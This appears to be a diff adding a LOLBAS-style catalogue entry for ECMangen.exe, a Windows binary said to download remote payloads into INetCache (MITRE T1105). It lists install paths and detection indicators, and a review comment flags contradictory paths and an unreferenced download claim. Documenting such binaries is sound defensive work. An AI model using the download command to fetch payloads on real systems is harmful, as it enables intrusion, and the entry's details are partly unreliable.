1 file changed +29 -0 lines changed
1+ ---
2+ Name : ECMangen.exe
3+ Description : Command-line tool for managing certificates in Microsoft Exchange Server.
4+ Author : Avihay Eldad
5+ Created : 2024-04-30
6+ Commands :
7+ - Command : ECMangen.exe {REMOTEURL}
8+ Description : Downloads payload from remote server
9+ Usecase : It will download a remote payload and place it in INetCache
10+ Category : Download
11+ Privileges : User
12+ MitreID : T1105
13+ OperatingSystem : Windows
14+ Tags :
15+ - Download : INetCache
16+ Full_Path :
17+ - Path : C:\Program Files (x86)\Microsoft SDKs\Windows\<version>\Bin\ECMangen.exe
18+ - Path : C:\Program Files (x86)\Microsoft SDKs\Windows\<version>\Bin\x64\ECMangen.exe
19+ - Path : C:\Program Files\Microsoft\Exchange Server\<version>\Bin\ECMangen.exe
20+ - Path : C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe
21+ - Path : C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe
22+ - Path : C:\ExchangeServer\Bin\ECMangen.exe
23+ Detection :
24+ - IOC : URL on a ECMangen command line
25+ - IOC : ECMangen making unexpected network connections or DNS requests
26+ Acknowledgement :
27+ - Person : Avihay Eldad
28+ Handle : ' @AvihayEldad'
29+ ---
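Review bot: The Description on line 3 calls this a tool for managing certificates in Microsoft Exchange Server, but the first two Full_Path entries (lines 17-18) sit under Microsoft SDKs\Windows, so the entry disagrees with itself about which product ships the binary. Please confirm what ECMangen.exe actually is, keep only the paths that were verified on a real install, and add a reference that backs the download-to-INetCache behaviour claimed on lines 7-9. Two smaller points: the Handle value on line 28 has a leading space inside the quotes (' @AvihayEldad' should be '@AvihayEldad'), and the IOC on line 24 should read "URL on an ECMangen command line".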